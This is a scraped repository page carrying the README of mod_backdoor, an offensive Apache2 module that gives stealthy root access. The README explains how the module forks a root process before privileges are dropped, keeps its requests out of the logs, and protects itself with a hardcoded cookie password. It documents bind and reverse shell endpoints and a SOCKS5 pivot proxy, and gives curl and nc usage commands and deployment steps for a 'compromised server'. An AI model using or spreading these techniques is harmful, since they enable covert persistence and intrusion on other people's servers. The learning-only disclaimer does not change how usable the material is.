Become an AceSign inSign up
VladRico/ apache2_BackdoorMod
C
View on GitHub
Need help with apache2_BackdoorMod?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

VladRico
152 Stars 35 Forks GNU General Public License v3.0 33 Commits 0 Opened issues

Description

A backdoor module for Apache2

Services available

!
?

Need anything else?

Contributors list

No Data

Apache2 mod_backdoor

mod_backdoor is a stealth backdoor using an Apache2 module.
The main idea is to fork() the primary Apache2 process just after it has loaded its config. Since it's forked before the root user transfers the process to www-data, you can execute command as root.
As Apache2 loads its configuration only when you (re)start it, the challenge was to never let die this forked root apache2 process, to let us interact as root with the compromised system.

Features

  • Bind TTY Shell
  • Reverse Shell (TTY , Native, PHP, Perl, Python, Ruby)
  • High stability and reliability, each shell spawns a new forked independent root process attached to PID 1 and removed from apache2 cgroup
  • Socks5 proxy
  • Password Protection through cookie headers
  • Ping module to know if its still active
  • Bypass logging mechanism. Each request to the backdoor module are not logged by Apache2.
  • Works on systemd systems, but should also work with init-like systems (with some adjustements, explained in Description section).

Demo

asciicast

Description

  • The password is send through Cookie headers: 

    Cookie: password=backdoor
    . It's defined with 
    #define
    in the beginning of mod_backdoor.c, so you could easily edit it.

  • Each following requests must contain this password to interact with the module.

  • Each request containing this cookie will not be logged by Apache if the module is running.

  • Each shell spawns attached to PID 1 and is removed from apache2 cgroup. It means it's possible to restart/stop apache2.service from a spawned shell (not true for TTY shells because an apache2 process is needed to do the bidirectional communication between socket and pty). It also improves stealth, shells are no longer related to apache2.service.

    • IPC socket is stored in the private /tmp folder provided by systemd service (by default).

On non-systemd systems, it should work aswell. The main differences are, with systemd, the IPC socket is stored in a private 

/tmp/
. This private 
/tmp
is automatically cleaned up when apache2 
. Systemd automatically kills all instance of apache2 when you ask for a 
 .



This is not the same behavior with init-like systems. There isn't private 
/tmp
 for the application, so the IPC socket is created in the public 
/tmp
.

The init service script doesn't know the PID of the forked root apache2 process, so our root process will not be killed by the script.

It means apache2 won't restart automatically because there is already a process listening on port 80 
(our root process). 
And if you kill it manually, the forked root apache2 process won't bind to IPC socket because
it tries to create another one on the same place (I've not handled the error \o/ ).



The workaround I've found is to replace the 
/var/run/apache2/apache2.pid
 with the PID of our forked root apache2 process and save the original one.

Doing so, it allows catching signal for a process you don't own:

 --> Overwrite signal handler for 
SIGTERM / SIGKILL
 in order to :
* Remove IPC socket
* Remove cgroup2 folder
* Put original PID in 
/var/run/apache2/apache2.pid

* Call 
apachectl stop
 to simulate the original behavior of the init script.
* Exit our forked root apache2 process


The path 
/var/run/apache2/apache2.pid
 is stored in the environment variable: 
APACHE_PID_FILE
 



If you have a better idea for init-like system, feel free to contact me (or PR) ! 



The apache2 server needs to be compiled with the mod_so to allow Dynamic Shared Object (DSO) support.



Bind TTY Shell



The endpoint  
http[s]:///bind/
 binds a listening port on 
:
 

When a connection is initiated to the listening port, the port closes. 


forkpty()
 is used to obtain a native TTY shell, working with an IPC UNIX socket to communicate 
between forked TTY process and the new socket you just opened.

Shells could be easily upgraded with the famous trick:

 
CTRL-Z --> stty raw -echo --> fg --> reset



Reverse TTY Shell



It works like the bind shell, the endpoint 
http[s]:///revtty//
 returns a TTY
shell to 
:
 



Reverse Shell (No TTY)



The endpoint 
http[s]:///reverse///
 returns a shell to 
:
. 


 must be one of these: 





| Native   | External  |

| :------: | :--------:|
|   sh     |    php    |
|   bash   |    python |
|   dash   |    ruby   |
|   ash    |    perl   |
|   tcsh   |           |
|   ksh    |           |






 must be in lower-case.

PHP uses the 
exec
 function.

Ruby isn't using 
/bin/sh
.


Socks5 proxy



Source code comes from https://github.com/rofl0r/microsocks 

The endpoint 
http[s]:///proxy//
 opens a socks5 proxy on 
. 

 is optional. If you set it, it activates the auth mode. Password is the same as the mod_backdoor.

Once a specific ip address authed successfully with 
user:pass
, it is added to a whitelist and may use the proxy without auth. 
This is handy for programs like firefox that don't support 
user:pass
 auth.

For it to work you'd basically make one connection with another program that supports it, and then you can use firefox too.

Example:

1. 
curl -H 'Cookie: password=backdoor' http:///proxy/1337/vlad
 

--> Start socks proxy on port 1337 for 
vlad
 user 
2. 
curl -x socks5://vlad:[email protected]:1337 https://www.google.com
 

--> Register your IP address
3. You could now use it without auth
4. When you're done, you can kill the socks proxy by sending 
imdonewithyou
 in a socket 

--> 
echo "imdonewithyou" | nc  1337



Ping module



The endpoint 
http[s]:///ping
 tells you if the module is currently working.


Notes



Apache2 Module Backdoor is inspired from Ringbuilder, created by Juan Manuel Fernandez (@TheXC3LL)

More info about Ringbuilder:

https://github.com/TarlogicSecurity/mod_ringbuilder 

https://www.tarlogic.com/en/blog/backdoors-modulos-apache/ 



Socks5 code was adapted from https://github.com/rofl0r/microsocks 



Special thanks to @Ug_0Security



Builds



For development :

* 
apxs -i -a -c mod_backdoor.c sblist.c sblist_delete.c server.c -Wl,-lutil
 

 
-Wl,-lutil
 used to link mod_backdoor.so with libutil.so to use forkpty() from 
* 
systemctl restart apache2



On a compromised server :

* Compile it for the desired arch and retrieve the modbackdoor.so or

get it from the 
build/
 folder (compiled for: Apache/2.4.41 (Debian)).
* Copy modbackdoor.so to 
/usr/lib/apache2/modules/mod_backdoor.so

* Copy backdoor.load to 
/etc/apache2/mod-available/backdoor.load

* 
a2enmod backdoor
 --> 
systemctl restart apache2



Author



Vlad Rico (@RicoVlad)



Disclaimer



This project was created only for learning purpose.

Usage of mod_backdoor for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program.



    
    
    
    
    
    
    
    



 We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.